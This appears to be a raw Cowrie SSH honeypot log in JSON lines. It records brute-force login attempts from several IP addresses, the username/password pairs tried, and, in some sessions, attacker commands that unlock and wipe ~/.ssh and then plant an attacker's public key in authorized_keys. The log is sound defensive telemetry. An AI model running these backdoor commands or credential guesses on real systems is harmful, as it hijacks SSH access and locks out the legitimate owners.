{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49693,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8431428c660","protocol":"ssh","message":"New connection: 212.227.235.229:49693 (1.2.3.4:22) [session: f8431428c660]","sensor":"my-vps","timestamp":"2025-09-09T06:54:07.256207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:07.257246Z","src_ip":"212.227.235.229","session":"f8431428c660"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:07.371840Z","src_ip":"212.227.235.229","session":"f8431428c660"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:54:07.872200Z","src_ip":"212.227.235.229","session":"f8431428c660"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:07.986916Z","src_ip":"212.227.235.229","session":"f8431428c660"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:07.987834Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":38234,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc6a1fb31b0d","protocol":"ssh","message":"New connection: 157.20.207.165:38234 (1.2.3.4:22) [session: fc6a1fb31b0d]","sensor":"my-vps","timestamp":"2025-09-09T06:54:12.130604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:12.131524Z","src_ip":"157.20.207.165","session":"fc6a1fb31b0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:12.877239Z","src_ip":"157.20.207.165","session":"fc6a1fb31b0d"}
{"eventid":"cowrie.login.failed","username":"tony","password":"tony","message":"login attempt [tony/tony] failed","sensor":"my-vps","timestamp":"2025-09-09T06:54:13.654048Z","src_ip":"157.20.207.165","session":"fc6a1fb31b0d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:14.839979Z","src_ip":"157.20.207.165","session":"fc6a1fb31b0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58487,"dst_ip":"1.2.3.4","dst_port":22,"session":"48569f90bc3a","protocol":"ssh","message":"New connection: 212.227.235.229:58487 (1.2.3.4:22) [session: 48569f90bc3a]","sensor":"my-vps","timestamp":"2025-09-09T06:54:44.616155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:44.617088Z","src_ip":"212.227.235.229","session":"48569f90bc3a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:44.860651Z","src_ip":"212.227.235.229","session":"48569f90bc3a"}
{"eventid":"cowrie.login.failed","username":"factory","password":"2025","message":"login attempt [factory/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:54:45.872122Z","src_ip":"212.227.235.229","session":"48569f90bc3a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:47.116187Z","src_ip":"212.227.235.229","session":"48569f90bc3a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57076,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f2d24f2a72d","protocol":"ssh","message":"New connection: 217.72.205.35:57076 (1.2.3.4:22) [session: 2f2d24f2a72d]","sensor":"my-vps","timestamp":"2025-09-09T06:54:48.063573Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:48.064620Z","src_ip":"217.72.205.35","session":"2f2d24f2a72d"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":53452,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7850028136a","protocol":"ssh","message":"New connection: 118.26.39.178:53452 (1.2.3.4:22) [session: d7850028136a]","sensor":"my-vps","timestamp":"2025-09-09T06:54:50.921268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:50.922259Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:51.119194Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.login.success","username":"root","password":"hetzner","message":"login attempt [root/hetzner] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:54:51.945486Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:54:52.409852Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:54:52.410574Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:54:52.411455Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:52.608388Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:54:53.020715Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:54:53.021451Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:54:53.219770Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:53.220579Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":53454,"dst_ip":"1.2.3.4","dst_port":22,"session":"07360062727e","protocol":"ssh","message":"New connection: 118.26.39.178:53454 (1.2.3.4:22) [session: 07360062727e]","sensor":"my-vps","timestamp":"2025-09-09T06:54:53.423224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:53.429383Z","src_ip":"118.26.39.178","session":"07360062727e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:53.629128Z","src_ip":"118.26.39.178","session":"07360062727e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:54:54.432096Z","src_ip":"118.26.39.178","session":"07360062727e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:55.635432Z","src_ip":"118.26.39.178","session":"07360062727e"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":53462,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d8b0ccbeef9","protocol":"ssh","message":"New connection: 118.26.39.178:53462 (1.2.3.4:22) [session: 5d8b0ccbeef9]","sensor":"my-vps","timestamp":"2025-09-09T06:54:55.835496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:55.836967Z","src_ip":"118.26.39.178","session":"5d8b0ccbeef9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:56.037776Z","src_ip":"118.26.39.178","session":"5d8b0ccbeef9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:54:56.882238Z","src_ip":"118.26.39.178","session":"5d8b0ccbeef9"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:57.080195Z","src_ip":"118.26.39.178","session":"d7850028136a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:57.083843Z","src_ip":"118.26.39.178","session":"5d8b0ccbeef9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62201,"dst_ip":"1.2.3.4","dst_port":22,"session":"1acdd6f2bb22","protocol":"ssh","message":"New connection: 212.227.235.229:62201 (1.2.3.4:22) [session: 1acdd6f2bb22]","sensor":"my-vps","timestamp":"2025-09-09T06:55:07.571336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:55:07.572208Z","src_ip":"212.227.235.229","session":"1acdd6f2bb22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:55:07.686930Z","src_ip":"212.227.235.229","session":"1acdd6f2bb22"}
{"eventid":"cowrie.login.failed","username":"huser","password":"111","message":"login attempt [huser/111] failed","sensor":"my-vps","timestamp":"2025-09-09T06:55:08.189965Z","src_ip":"212.227.235.229","session":"1acdd6f2bb22"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:55:09.307537Z","src_ip":"212.227.235.229","session":"1acdd6f2bb22"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":36388,"dst_ip":"1.2.3.4","dst_port":22,"session":"781ddd5bf48f","protocol":"ssh","message":"New connection: 157.20.207.165:36388 (1.2.3.4:22) [session: 781ddd5bf48f]","sensor":"my-vps","timestamp":"2025-09-09T06:55:24.410872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:55:24.412124Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:55:24.595838Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsx123","message":"login attempt [root/qazwsx123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:55:25.372270Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:55:25.796537Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:55:25.797200Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:55:25.798089Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:55:25.982579Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:55:26.402130Z","src_ip":"157.20.207.165","session":"781ddd5bf48f"}
